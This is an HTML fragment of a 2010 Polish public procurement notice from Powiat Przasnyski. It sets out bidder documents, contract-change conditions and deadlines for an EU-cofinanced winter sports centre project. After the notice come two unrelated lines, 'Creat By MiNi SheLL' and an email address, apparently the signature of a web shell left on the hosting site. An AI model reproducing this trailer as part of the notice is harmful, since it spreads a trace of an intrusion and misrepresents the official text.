<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22
ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy
przedłożyć:
1)	oświadczenie, sporządzone według wzoru stanowiącego załącznik nr 2 do niniejszych SIWZ, o spełnianiu warunków udziału w postępowaniu (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie musi być przedmiotowe oświadczenia złożone (podpisane) przez Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub oświadczenie złożone (podpisane) przez każdego z wykonawców składających ofertę wspólną);
2)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej SIWZ oraz informacje na temat ich kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia według wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ, a także zakresu wykonywanych przez nie czynności (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał kadrowy oraz łączne kwalifikacje i doświadczenie); 
3)	Oświadczenie, że osoby wskazane w wykazie osób posiadają wymagane uprawnienia, sporządzone według wzoru stanowiącego załącznik nr 3 do niniejszej SIWZ
4)	Wykaz wykonanych we wskazanym okresie usług, z podaniem ich wartości oraz daty i miejsca wykonania, sporządzony według wzoru stanowiącego załącznik nr 5 do niniejszej SIWZ oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie).
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. W przypadku polegania na zasobach innych podmiotów konieczne jest załączenie do oferty pisemnych zobowiązań tych podmiotów do oddania do dyspozycji potrzebnych zasobów Wykonawcy na okres wykonywania zamówienia. *UWAGA! * Wykonawca jest zobowiązany do załączenia tego zobowiązania do składanej oferty tylko w przypadku polegania na wyżej wymienionych zasobach.
W celu potwierdzenia, sytuacji opisanej powyżej w której Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca jest zobowiązany do przedstawienia stosownego oświadczenia potwierdzającego powyższe fakty. Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów, o których mowa wyżej, na zasadach określonych w art. 26 ust. 2b ustawy prawo zamówień publicznych, a podmioty te będą brały udział w realizacji zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wymienionych poniżej
W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż PLN, Zamawiający jako kurs przeliczeniowy waluty, w której oszacowano warunki finansowo-ekonomiczne przyjmie średni kurs NBP z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Ten sam kurs Zamawiający przyjmie przy przeliczeniu wszelkich innych danych finansowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. 	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności z zastosowaniem art. 144 ust. 1 i 2 ustawy Prawo zamówień publicznych, w przypadku: 
b) 	zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno-prawnej, przekształceniem lub połączeniem z inną firmą;
c) 	zmiany terminu wykonania robót objętych nadzorem lub zmiany harmonogramu rzeczowo-finansowego:
- spowodowanej przedłużeniem, z przyczyn niezależnych od Wykonawcy, czasu wydania decyzji administracyjnych przez właściwe organy lub inne podmioty w stosunku do terminów wynikających z obowiązujących przepisów prawa, jeżeli uniemożliwia to lub wstrzymuje w istotny sposób realizację robót,
- 	spowodowanej wstrzymaniem robót, z przyczyn niezależnych od Wykonawcy, przez uprawniony organ,
- spowodowanej udzieleniem zamówienia dodatkowego bądź  powodującego wstrzymanie zamówienia podstawowego,
- spowodowanej koniecznością usuwania kolizji, usterek, awarii, napraw uzbrojenia podziemnego, nadziemnego bądź urządzeń przez ich użytkowników, co może uniemożliwić terminową realizację zadania,
-	przestojów i opóźnień zawinionych przez Zamawiającego,
-	przestojów i opóźnień zawinionych przez Wykonawcę Robót Budowlanych,
- 	wystąpienia okoliczności, których strony umowy nie mogły przewidzieć pomimo zachowania należytej staranności, 
- 	spowodowanej działaniem siły wyższej.                                                                                                           
d) 	zmiany osób przewidzianych do nadzorowania prac w przypadku:
-	śmierci, choroby lub innych zdarzeń losowych;
-	niewywiązywania się z obowiązków wynikających z umowy;
-	jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji, itp.).
2. 	W przypadku zmiany osób, nowe osoby powołane do pełnienia ww. obowiązków muszą spełniać wymagania określone dla danej funkcji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.powiat-przasnysz.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Przasnyski, ul. Św.St. Kostki 5, 06-300 Przasnysz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2010 godzina 11:00, miejsce: Starostwo Powiatowe w Przasnyszu, ul. Św. St. Kostki 5, 06-300 Przasnysz pokój nr 84.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013 Oś Priorytetowa VII Tworzenie i poprawa warunków dla rozwoju kapitału ludzkiego Działanie 7.2.: Infrastruktura służąca edukacji Projekt pn. Mazowieckie Centrum Sportów Zimowych - Kompleks Chorzele - etap I.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com